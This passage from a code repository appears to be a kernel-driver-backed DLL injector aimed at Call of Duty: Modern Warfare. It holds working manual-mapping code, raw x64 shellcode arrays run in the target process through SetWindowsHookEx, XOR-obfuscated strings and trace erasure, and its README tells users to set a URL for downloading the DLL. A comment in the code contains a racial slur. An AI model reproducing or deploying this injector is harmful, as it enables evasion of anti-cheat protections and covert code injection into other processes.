 49 |     <CharacterSet>MultiByte</CharacterSet>
 50 |   </PropertyGroup>
 51 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 52 |     <ConfigurationType>Application</ConfigurationType>
 53 |     <UseDebugLibraries>false</UseDebugLibraries>
 54 |     <PlatformToolset>v143</PlatformToolset>
 55 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 56 |     <CharacterSet>MultiByte</CharacterSet>
 57 |   </PropertyGroup>
 58 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 59 |     <ConfigurationType>Application</ConfigurationType>
 60 |     <UseDebugLibraries>true</UseDebugLibraries>
 61 |     <PlatformToolset>v143</PlatformToolset>
 62 |     <CharacterSet>MultiByte</CharacterSet>
 63 |   </PropertyGroup>
 64 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 65 |     <ConfigurationType>Application</ConfigurationType>
 66 |     <UseDebugLibraries>false</UseDebugLibraries>
 67 |     <PlatformToolset>v143</PlatformToolset>
 68 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 69 |     <CharacterSet>MultiByte</CharacterSet>
 70 |     <SpectreMitigation>false</SpectreMitigation>
 71 |   </PropertyGroup>
 72 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 73 |   <ImportGroup Label="ExtensionSettings">
 74 |   </ImportGroup>
 75 |   <ImportGroup Label="Shared">
 76 |   </ImportGroup>
 77 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 78 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 79 |   </ImportGroup>
 80 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 81 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 82 |   </ImportGroup>
 83 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 84 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 85 |   </ImportGroup>
 86 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 87 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 88 |   </ImportGroup>
 89 |   <PropertyGroup Label="UserMacros" />
 90 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 91 |     <TargetName>private</TargetName>
 92 |   </PropertyGroup>
 93 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 94 |     <ClCompile>
 95 |       <WarningLevel>Level3</WarningLevel>
 96 |       <Optimization>Disabled</Optimization>
 97 |       <SDLCheck>true</SDLCheck>
 98 |       <ConformanceMode>true</ConformanceMode>
 99 |     </ClCompile>
100 |     <Link>
101 |       <SubSystem>Console</SubSystem>
102 |     </Link>
103 |   </ItemDefinitionGroup>
104 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
105 |     <ClCompile>
106 |       <WarningLevel>Level3</WarningLevel>
107 |       <Optimization>Disabled</Optimization>
108 |       <SDLCheck>true</SDLCheck>
109 |       <ConformanceMode>true</ConformanceMode>
110 |     </ClCompile>
111 |     <Link>
112 |       <SubSystem>Console</SubSystem>
113 |     </Link>
114 |   </ItemDefinitionGroup>
115 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
116 |     <ClCompile>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <Optimization>MaxSpeed</Optimization>
119 |       <FunctionLevelLinking>true</FunctionLevelLinking>
120 |       <IntrinsicFunctions>true</IntrinsicFunctions>
121 |       <SDLCheck>true</SDLCheck>
122 |       <ConformanceMode>true</ConformanceMode>
123 |     </ClCompile>
124 |     <Link>
125 |       <SubSystem>Console</SubSystem>
126 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
127 |       <OptimizeReferences>true</OptimizeReferences>
128 |     </Link>
129 |   </ItemDefinitionGroup>
130 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
131 |     <ClCompile>
132 |       <WarningLevel>Level3</WarningLevel>
133 |       <Optimization>MaxSpeed</Optimization>
134 |       <FunctionLevelLinking>true</FunctionLevelLinking>
135 |       <IntrinsicFunctions>true</IntrinsicFunctions>
136 |       <SDLCheck>false</SDLCheck>
137 |       <ConformanceMode>false</ConformanceMode>
138 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
139 |     </ClCompile>
140 |     <Link>
141 |       <SubSystem>Console</SubSystem>
142 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
143 |       <OptimizeReferences>true</OptimizeReferences>
144 |       <UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
145 |       <GenerateDebugInformation>false</GenerateDebugInformation>
146 |       <ProgramDatabaseFile />
147 |     </Link>
148 |   </ItemDefinitionGroup>
149 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
150 |   <ImportGroup Label="ExtensionTargets">
151 |   </ImportGroup>
152 | </Project>


--------------------------------------------------------------------------------
/IanJect.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Communication">
 5 |       <UniqueIdentifier>{5cb1c179-92ab-4cf3-999f-bb1cc8ce2acf}</UniqueIdentifier>
 6 |     </Filter>
 7 |     <Filter Include="Definition">
 8 |       <UniqueIdentifier>{9bb37740-cf8f-48f9-a9f5-3b2456ea9c3d}</UniqueIdentifier>
 9 |     </Filter>
10 |     <Filter Include="Driver">
11 |       <UniqueIdentifier>{28fd2e47-d7fd-4b72-bee1-3ffd5bd481ba}</UniqueIdentifier>
12 |     </Filter>
13 |     <Filter Include="Injection">
14 |       <UniqueIdentifier>{e03e37e0-d4a8-458f-9f7a-3ace8b954866}</UniqueIdentifier>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="Injection\injector.h">
19 |       <Filter>Injection</Filter>
20 |     </ClInclude>
21 |     <ClInclude Include="Driver\defines.h">
22 |       <Filter>Driver</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="Driver\driver.h">
25 |       <Filter>Driver</Filter>
26 |     </ClInclude>
27 |     <ClInclude Include="Definition\stdafx.h">
28 |       <Filter>Definition</Filter>
29 |     </ClInclude>
30 |     <ClInclude Include="Communication\api.h">
31 |       <Filter>Communication</Filter>
32 |     </ClInclude>
33 |     <ClInclude Include="Communication\drvutils.h">
34 |       <Filter>Communication</Filter>
35 |     </ClInclude>
36 |     <ClInclude Include="Communication\shellcode.h">
37 |       <Filter>Communication</Filter>
38 |     </ClInclude>
39 |     <ClInclude Include="Communication\xor.h">
40 |       <Filter>Communication</Filter>
41 |     </ClInclude>
42 |     <ClInclude Include="Injection\Utilities.h">
43 |       <Filter>Injection</Filter>
44 |     </ClInclude>
45 |     <ClInclude Include="Communication\Utils.h">
46 |       <Filter>Communication</Filter>
47 |     </ClInclude>
48 |   </ItemGroup>
49 |   <ItemGroup>
50 |     <ClCompile Include="Driver\driver.cpp">
51 |       <Filter>Driver</Filter>
52 |     </ClCompile>
53 |     <ClCompile Include="main.cpp" />
54 |   </ItemGroup>
55 | </Project>


--------------------------------------------------------------------------------
/IanJect.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/Injection/Utilities.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
 4 | PVOID GetDLLFile(LPCWSTR file_path)
 5 | {
 6 | 	HANDLE h_dll = CreateFileW(file_path, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 7 | 	if (h_dll == INVALID_HANDLE_VALUE) 
 8 | 		return NULL; 
 9 | 
10 | 	DWORD dll_file_sz = GetFileSize(h_dll, NULL);
11 | 	PVOID dll_buffer = VirtualAlloc(NULL, dll_file_sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
12 | 
13 | 	if (!ReadFile(h_dll, dll_buffer, dll_file_sz, NULL, FALSE) || *(PDWORD)dll_buffer != 9460301)
14 | 	{
15 | 		VirtualFree(dll_buffer, 0, MEM_RELEASE);
16 | 		goto exit;
17 | 	}
18 | 
19 | exit:
20 | 	CloseHandle(h_dll);
21 | 	return dll_buffer;
22 | }
23 | 
24 | std::wstring to_fast_convert_wchar(PCCH a)
25 | {
26 | 	std::wstring out_str;
27 | 
28 | 	for (int i = 0; i < strlen(a) + 1; i++)
29 | 		out_str.push_back((const wchar_t)a[i]);
30 | 
31 | 	return out_str;
32 | }
33 | 
34 | DWORD ThreadProcID(LPCSTR window_class_name, PDWORD p_thread_id)
35 | {
36 | 	DWORD process_id = 0;
37 | 	while (!process_id)
38 | 	{
39 | 		*p_thread_id = GetWindowThreadProcessId(FindWindow(window_class_name, NULL), &process_id); Sleep(20);
40 | 	} return process_id;
41 | }
42 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
43 | 
44 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
45 | DWORD ProcIDName(PCSTR name)
46 | {
47 | 	DWORD pid = 0;
48 | 
49 | 	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
50 | 	PROCESSENTRY32 process;
51 | 	ZeroMemory(&process, sizeof(process));
52 | 	process.dwSize = sizeof(process);
53 | 
54 | 	if (Process32First(snapshot, &process))
55 | 	{
56 | 		do
57 | 		{
58 | 			if (string(process.szExeFile) == string(name))
59 | 			{
60 | 				pid = process.th32ProcessID;
61 | 				break;
62 | 			}
63 | 		} while (Process32Next(snapshot, &process));
64 | 	}
65 | 
66 | 	CloseHandle(snapshot);
67 | 	return pid;
68 | }
69 | 
70 | string NameByPid(DWORD process_id)
71 | {
72 | 	PROCESSENTRY32 processInfo;
73 | 	processInfo.dwSize = sizeof(processInfo);
74 | 	HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
75 | 	if (processesSnapshot == INVALID_HANDLE_VALUE)
76 | 		return 0;
77 | 
78 | 	for (BOOL bok = Process32First(processesSnapshot, &processInfo); bok; bok = Process32Next(processesSnapshot, &processInfo))
79 | 	{
80 | 		if (process_id == processInfo.th32ProcessID)
81 | 		{
82 | 			return processInfo.szExeFile;
83 | 		}
84 | 	}
85 | 
86 | 	CloseHandle(processesSnapshot);
87 | 	return string();
88 | }
89 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
90 | 


--------------------------------------------------------------------------------
/Injection/injector.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include "Utilities.h"
  3 | 
  4 | /////////////////////////////////
  5 | BYTE RemoteLoadLib[96] = 
  6 | {
  7 | 	0x48, 0x83, 0xEC, 0x38, 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8B, 0x44, 0x24, 0x20,
  8 | 	0x83, 0x38, 0x00, 0x75, 0x3D, 0x48, 0x8B, 0x44, 0x24, 0x20, 0xC7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0x8B, 0x40,
  9 | 	0x08, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0x83, 0xC0, 0x18, 0x48, 0x8B, 0xC8, 0xFF, 0x54, 0x24, 0x28, 0x48, 0x8B,
 10 | 	0x4C, 0x24, 0x20, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x44, 0x24, 0x20, 0xC7, 0x00, 0x02, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC
 11 | };
 12 | 
 13 | BYTE CallDLLMAIN[92] = 
 14 | {
 15 | 	0x48, 0x83, 0xEC, 0x38, 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8B, 0x44, 0x24,
 16 | 	0x20, 0x83, 0x38, 0x00, 0x75, 0x39, 0x48, 0x8B, 0x44, 0x24, 0x20, 0xC7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48,
 17 | 	0x8B, 0x40, 0x08, 0x48, 0x89, 0x44, 0x24, 0x28, 0x45, 0x33, 0xC0, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0x8B,
 18 | 	0x48, 0x10, 0xFF, 0x54, 0x24, 0x28, 0x48, 0x8B, 0x44, 0x24, 0x20, 0xC7, 0x00, 0x02, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC
 19 | }; DWORD ShellOffset = 0x6;
 20 | /////////////////////////////////
 21 | 
 22 | /////////////////////////////////
 23 | typedef struct _load_library_struct
 24 | {
 25 | 	int status;
 26 | 	uintptr_t fn_load_library_a;
 27 | 	uintptr_t module_base;
 28 | 	char module_name[80];
 29 | }load_library_struct;
 30 | 
 31 | typedef struct _main_struct
 32 | {
 33 | 	int status;
 34 | 	uintptr_t fn_dll_main;
 35 | 	HINSTANCE dll_base;
 36 | } main_struct;
 37 | /////////////////////////////////
 38 | 
 39 | /////////////////////////////////
 40 | uintptr_t call_remote_load_library(DWORD thread_id, LPCSTR dll_name)
 41 | {
 42 | 	/////////////////////////////////
 43 | 	HMODULE nt_dll = LoadLibraryW(xor_w(L"ntdll.dll"));
 44 | 	/////////////////////////////////
 45 | 
 46 | 	/////////////////////////////////
 47 | 	PVOID alloc_shell_code = DRV().alloc_memory_ex(4096, PAGE_EXECUTE_READWRITE);
 48 | 	DWORD shell_size = sizeof(RemoteLoadLib) + sizeof(load_library_struct);
 49 | 	PVOID alloc_local = VirtualAlloc(NULL, shell_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 50 | 	/////////////////////////////////
 51 | 
 52 | 	/////////////////////////////////
 53 | 	RtlCopyMemory(alloc_local, &RemoteLoadLib, sizeof(RemoteLoadLib));
 54 | 	uintptr_t shell_data = (uintptr_t)alloc_shell_code + sizeof(RemoteLoadLib);
 55 | 	*(uintptr_t*)((uintptr_t)alloc_local + ShellOffset) = shell_data;
 56 | 	load_library_struct* ll_data = (load_library_struct*)((uintptr_t)alloc_local + sizeof(RemoteLoadLib));
 57 | 	ll_data->fn_load_library_a = (uintptr_t)LoadLibraryA;
 58 | 	strcpy_s(ll_data->module_name, 80, dll_name);
 59 | 	/////////////////////////////////
 60 | 
 61 | 	/////////////////////////////////
 62 | 	DRV().write_memory_ex(alloc_shell_code, alloc_local, shell_size);
 63 | 	HHOOK h_hook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)alloc_shell_code, nt_dll, thread_id);
 64 | 	/////////////////////////////////
 65 | 
 66 | 	/////////////////////////////////
 67 | 	while (ll_data->status != 2) 
 68 | 	{
 69 | 		PostThreadMessage(thread_id, WM_NULL, 0, 0);
 70 | 		DRV().read_memory_ex((PVOID)shell_data, (PVOID)ll_data, sizeof(load_library_struct));
 71 | 		Sleep(10);
 72 | 	} uintptr_t mod_base = ll_data->module_base;
 73 | 	/////////////////////////////////
 74 | 
 75 | 	/////////////////////////////////
 76 | 	UnhookWindowsHookEx(h_hook);
 77 | 	DRV().free_memory_ex(alloc_shell_code);
 78 | 	VirtualFree(alloc_local, 0, MEM_RELEASE);
 79 | 	/////////////////////////////////
 80 | 
 81 | 	return mod_base;
 82 | }
 83 | /////////////////////////////////
 84 | 
 85 | /////////////////////////////////
 86 | void call_dll_main(DWORD thread_id, PVOID dll_base, PIMAGE_NT_HEADERS nt_header, bool hide_dll)
 87 | {
 88 | 	/////////////////////////////////
 89 | 	HMODULE nt_dll = LoadLibraryW(xor_w(L"ntdll.dll"));
 90 | 	/////////////////////////////////
 91 | 
 92 | 	/////////////////////////////////
 93 | 	PVOID alloc_shell_code = DRV().alloc_memory_ex(4096, PAGE_EXECUTE_READWRITE);
 94 | 	DWORD shell_size = sizeof(CallDLLMAIN) + sizeof(main_struct);
 95 | 	PVOID alloc_local = VirtualAlloc(NULL, shell_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 96 | 	/////////////////////////////////
 97 | 
 98 | 	/////////////////////////////////
 99 | 	RtlCopyMemory(alloc_local, &CallDLLMAIN, sizeof(CallDLLMAIN));
100 | 	uintptr_t shell_data = (uintptr_t)alloc_shell_code + sizeof(CallDLLMAIN);
101 | 	*(uintptr_t*)((uintptr_t)alloc_local + ShellOffset) = shell_data;
102 | 	main_struct* main_data = (main_struct*)((uintptr_t)alloc_local + sizeof(CallDLLMAIN));
103 | 	main_data->dll_base = (HINSTANCE)dll_base;
104 | 	main_data->fn_dll_main = ((uintptr_t)dll_base + nt_header->OptionalHeader.AddressOfEntryPoint);
105 | 	/////////////////////////////////
106 | 
107 | 	/////////////////////////////////
108 | 	DRV().write_memory_ex(alloc_shell_code, alloc_local, shell_size);
109 | 	HHOOK h_hook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)alloc_shell_code, nt_dll, thread_id);
110 | 	/////////////////////////////////
111 | 
112 | 	/////////////////////////////////
113 | 	while (main_data->status != 2)
114 | 	{
115 | 		PostThreadMessage(thread_id, WM_NULL, 0, 0);
116 | 		DRV().read_memory_ex((PVOID)shell_data, (PVOID)main_data, sizeof(main_struct));
117 | 		Sleep(10);
118 | 	}
119 | 	/////////////////////////////////
120 | 
121 | 	/////////////////////////////////
122 | 	UnhookWindowsHookEx(h_hook);
123 | 	DRV().free_memory_ex(alloc_shell_code);
124 | 	VirtualFree(alloc_local, 0, MEM_RELEASE);
125 | 	/////////////////////////////////
126 | }
127 | 
128 | PVOID rva_va(uintptr_t rva, PIMAGE_NT_HEADERS nt_head, PVOID local_image)
129 | {
130 | 	PIMAGE_SECTION_HEADER p_first_sect = IMAGE_FIRST_SECTION(nt_head);
131 | 	for (PIMAGE_SECTION_HEADER p_section = p_first_sect; p_section < p_first_sect + nt_head->FileHeader.NumberOfSections; p_section++)
132 | 		if (rva >= p_section->VirtualAddress && rva < p_section->VirtualAddress + p_section->Misc.VirtualSize)
133 | 			return (PUCHAR)local_image + p_section->PointerToRawData + (rva - p_section->VirtualAddress);
134 | 
135 | 	return NULL;
136 | }
137 | 
138 | uintptr_t resolve_func_addr(LPCSTR modname, LPCSTR modfunc)
139 | {
140 | 	HMODULE h_module = LoadLibraryExA(modname, NULL, DONT_RESOLVE_DLL_REFERENCES);
141 | 	uintptr_t func_offset = (uintptr_t)GetProcAddress(h_module, modfunc);
142 | 	func_offset -= (uintptr_t)h_module;
143 | 	FreeLibrary(h_module);
144 | 
145 | 	return func_offset;
146 | }
147 | 
148 | BOOL relocate_image(PVOID p_remote_img, PVOID p_local_img, PIMAGE_NT_HEADERS nt_head)
149 | {
150 | 	struct reloc_entry
151 | 	{
152 | 		ULONG to_rva;
153 | 		ULONG size;
154 | 		struct
155 | 		{
156 | 			WORD offset : 12;
157 | 			WORD type : 4;
158 | 		} item[1];
159 | 	};
160 | 
161 | 	uintptr_t delta_offset = (uintptr_t)p_remote_img - nt_head->OptionalHeader.ImageBase;
162 | 	if (!delta_offset) return true; else if (!(nt_head->OptionalHeader.DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)) return false;
163 | 	reloc_entry* reloc_ent = (reloc_entry*)rva_va(nt_head->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, nt_head, p_local_img);
164 | 	uintptr_t reloc_end = (uintptr_t)reloc_ent + nt_head->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
165 | 
166 | 	if (reloc_ent == nullptr)
167 | 		return true;
168 | 
169 | 	while ((uintptr_t)reloc_ent < reloc_end && reloc_ent->size)
170 | 	{
171 | 		DWORD records_count = (reloc_ent->size - 8) >> 1;
172 | 		for (DWORD i = 0; i < records_count; i++)
173 | 		{
174 | 			WORD fix_type = (reloc_ent->item[i].type);
175 | 			WORD shift_delta = (reloc_ent->item[i].offset) % 4096;
176 | 
177 | 			if (fix_type == IMAGE_REL_BASED_ABSOLUTE)
178 | 				continue;
179 | 
180 | 			if (fix_type == IMAGE_REL_BASED_HIGHLOW || fix_type == IMAGE_REL_BASED_DIR64)
181 | 			{
182 | 				uintptr_t fix_va = (uintptr_t)rva_va(reloc_ent->to_rva, nt_head, p_local_img);
183 | 
184 | 				if (!fix_va)
185 | 					fix_va = (uintptr_t)p_local_img;
186 | 
187 | 				*(uintptr_t*)(fix_va + shift_delta) += delta_offset;
188 | 			}
189 | 		}
190 | 
191 | 		reloc_ent = (reloc_entry*)((LPBYTE)reloc_ent + reloc_ent->size);
192 | 	} return true;
193 | }
194 | 
195 | BOOL resolve_import(DWORD thread_id, PVOID p_local_img, PIMAGE_NT_HEADERS nt_head)
196 | {
197 | 	PIMAGE_IMPORT_DESCRIPTOR import_desc = (PIMAGE_IMPORT_DESCRIPTOR)rva_va(nt_head->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, nt_head, p_local_img);
198 | 	if (!nt_head->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress || !nt_head->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) return true;
199 | 
200 | 	LPSTR module_name = NULL;
201 | 	while ((module_name = (LPSTR)rva_va(import_desc->Name, nt_head, p_local_img)))
202 | 	{
203 | 		uintptr_t base_image;
204 | 		base_image = call_remote_load_library(thread_id, module_name);
205 | 
206 | 		if (!base_image)
207 | 			return false;
208 | 
209 | 		PIMAGE_THUNK_DATA ih_data = (PIMAGE_THUNK_DATA)rva_va(import_desc->FirstThunk, nt_head, p_local_img);
210 | 		while (ih_data->u1.AddressOfData)
211 | 		{
212 | 			if (ih_data->u1.Ordinal & IMAGE_ORDINAL_FLAG)
213 | 				ih_data->u1.Function = base_image + resolve_func_addr(module_name, (LPCSTR)(ih_data->u1.Ordinal & 0xFFFF));
214 | 			else
215 | 			{
216 | 				IMAGE_IMPORT_BY_NAME* ibn = (PIMAGE_IMPORT_BY_NAME)rva_va(ih_data->u1.AddressOfData, nt_head, p_local_img);
217 | 				ih_data->u1.Function = base_image + resolve_func_addr(module_name, (LPCSTR)ibn->Name);
218 | 			} ih_data++;
219 | 		} import_desc++;
220 | 	} return true;
221 | }
222 | 
223 | void write_sections(PVOID p_module_base, PVOID local_image, PIMAGE_NT_HEADERS nt_head)
224 | {
225 | 	PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(nt_head);
226 | 	for (WORD sec_cnt = 0; sec_cnt < nt_head->FileHeader.NumberOfSections; sec_cnt++, section++)
227 | 	{
228 | 		DRV().write_memory_ex((PVOID)((uintptr_t)p_module_base + section->VirtualAddress), (PVOID)((uintptr_t)local_image + section->PointerToRawData), section->SizeOfRawData);
229 | 	}
230 | }
231 | 
232 | void erase_discardable_sect(PVOID p_module_base, PIMAGE_NT_HEADERS nt_head)
233 | {
234 | 	PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(nt_head);
235 | 	for (WORD sec_cnt = 0; sec_cnt < nt_head->FileHeader.NumberOfSections; sec_cnt++, section++)
236 | 	{
237 | 		if (section->SizeOfRawData == 0)
238 | 			continue;
239 | 
240 | 		if (section->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)
241 | 		{
242 | 			PVOID zero_memory = VirtualAlloc(NULL, section->SizeOfRawData, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
243 | 			DRV().write_memory_ex((PVOID)((uintptr_t)p_module_base + section->VirtualAddress), zero_memory, section->SizeOfRawData);
244 | 			VirtualFree(zero_memory, 0, MEM_RELEASE);
245 | 		}
246 | 	}
247 | }
248 | /////////////////////////////////
249 | 
250 | /////////////////////////////////
251 | void Enject(LPCSTR window_class_name, LPCWSTR dll_path)
252 | {
253 | 	// get dll file
254 | 	PVOID DLLBYTES = GetDLLFile(dll_path);
255 | 	if (!DLLBYTES)
256 | 		printf(xor_a(""));
257 | 
258 | 	// parse nt header
259 | 	PIMAGE_NT_HEADERS Header = RtlImageNtHeader(DLLBYTES);
260 | 	if (!Header)
261 | 		printf(xor_a(""));
262 | 
263 | 	// get process id & thread id
264 | 	DWORD ThreadID;
265 | 	DWORD ProcID = ThreadProcID(window_class_name, &ThreadID);
266 | 
267 | 	cout << xor_a("") << hex << ProcID << endl;
268 | 	cout << xor_a("") << hex << ThreadID << endl;
269 | 
270 | 	if (ProcID != 0 && ThreadID != 0)
271 | 	{		
272 | 		// attach target process
273 | 		DRV().AttachToProcess(ProcID);
274 | 		
275 | 		PVOID BaseAddress = DRV().alloc_memory_ex(Header->OptionalHeader.SizeOfImage, PAGE_EXECUTE_READWRITE);
276 | 		cout << xor_a("") << hex << BaseAddress << endl;
277 | 
278 | 		// fix reloc
279 | 		if (!relocate_image(BaseAddress, DLLBYTES, Header))
280 | 		{
281 | 			DRV().free_memory_ex(BaseAddress);
282 | 			printf(xor_a(""));
283 | 		}
284 | 
285 | 		printf(xor_a(""));
286 | 
287 | 		// fix import
288 | 		if (!resolve_import(ThreadID, DLLBYTES, Header))
289 | 		{
290 | 			DRV().free_memory_ex(BaseAddress);
291 | 			printf(xor_a(""));
292 | 		}
293 | 
294 | 		printf(xor_a(""));
295 | 
296 | 		// write dll here niggors
297 | 		write_sections(BaseAddress, DLLBYTES, Header);
298 | 
299 | 		printf(xor_a(""));
300 | 
301 | 		// call dll main
302 | 		call_dll_main(ThreadID, BaseAddress, Header, false);
303 | 
304 | 		printf(xor_a(""));
305 | 
306 | 		// cleanup
307 | 		erase_discardable_sect(BaseAddress, Header);
308 | 		VirtualFree(DLLBYTES, 0, MEM_RELEASE);
309 | 
310 | 		printf(xor_a(""));
311 | 		printf(xor_a(""));
312 | 		cout << endl;
313 | 	}
314 | 	else
315 | 	{
316 | 		printf(xor_a(""));
317 | 	}
318 | }
319 | /////////////////////////////////
320 | 
321 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CodMWKernelInjector
2 | 
3 | change dwnld_URL to download link of your dll
4 | 


--------------------------------------------------------------------------------
/main.cpp:
--------------------------------------------------------------------------------
  1 | #include "Definition/stdafx.h"
  2 | #include "Communication/xor.h"
  3 | #include "Communication/api.h"
  4 | #include "driver/driver.h"
  5 | #include "injection/injector.h"
  6 | #include "Communication/drvutils.h"
  7 | ///////////////////////////////////////////
  8 | #include <iostream>
  9 | #include <tlhelp32.h>
 10 | #include <fstream>
 11 | #include <filesystem>
 12 | #include <conio.h>
 13 | #include <tchar.h>
 14 | #include <urlmon.h>
 15 | #define _WIN32_WINNT 0x0500
 16 | #include <iostream>
 17 | #include <Windows.h>
 18 | #include <string>
 19 | #include <stdio.h>
 20 | #include <stdlib.h>
 21 | #include <string.h>
 22 | #pragma comment(lib, "urlmon.lib")
 23 | #include <Mmsystem.h>
 24 | #include <mciapi.h>
 25 | #include <cstdio>
 26 | #include <strsafe.h>
 27 | #include <cstdlib>
 28 | #include <windows.h>
 29 | #include <d3d9.h>
 30 | #include <iostream>
 31 | #include <Dwmapi.h> 
 32 | #include <TlHelp32.h>
 33 | //////////////////////////////////////////
 34 | 
 35 | using namespace std;
 36 | 
 37 | char ProcWindow[24];
 38 | char dllname[24];
 39 | 
 40 | void setcolor(unsigned short color)
 41 | {
 42 | 	HANDLE hcon = GetStdHandle(STD_OUTPUT_HANDLE);
 43 | 	SetConsoleTextAttribute(hcon, color);
 44 | }
 45 | 
 46 | void SetConsoleWindow(HANDLE conout, SHORT cols, SHORT rows)
 47 | {
 48 | 	CONSOLE_SCREEN_BUFFER_INFOEX sbInfoEx;
 49 | 	sbInfoEx.cbSize = sizeof(CONSOLE_SCREEN_BUFFER_INFOEX);
 50 | 	GetConsoleScreenBufferInfoEx(conout, &sbInfoEx);
 51 | 	sbInfoEx.dwSize.X = cols;
 52 | 	sbInfoEx.dwSize.Y = rows;
 53 | 	sbInfoEx.srWindow = { 0, 0, cols, rows };
 54 | 	sbInfoEx.dwMaximumWindowSize = { cols, rows };
 55 | 	SetConsoleScreenBufferInfoEx(conout, &sbInfoEx);
 56 | 
 57 | 	DWORD mode;
 58 | 	GetConsoleMode(conout, &mode);
 59 | 	mode &= ~ENABLE_WRAP_AT_EOL_OUTPUT;
 60 | 	SetConsoleMode(conout, mode);
 61 | 
 62 | 
 63 | }
 64 | 
 65 | int s_width = 800;
 66 | int s_height = 600;
 67 | #define CENTERX (GetSystemMetrics(SM_CXSCREEN)/2)-(s_width/2)
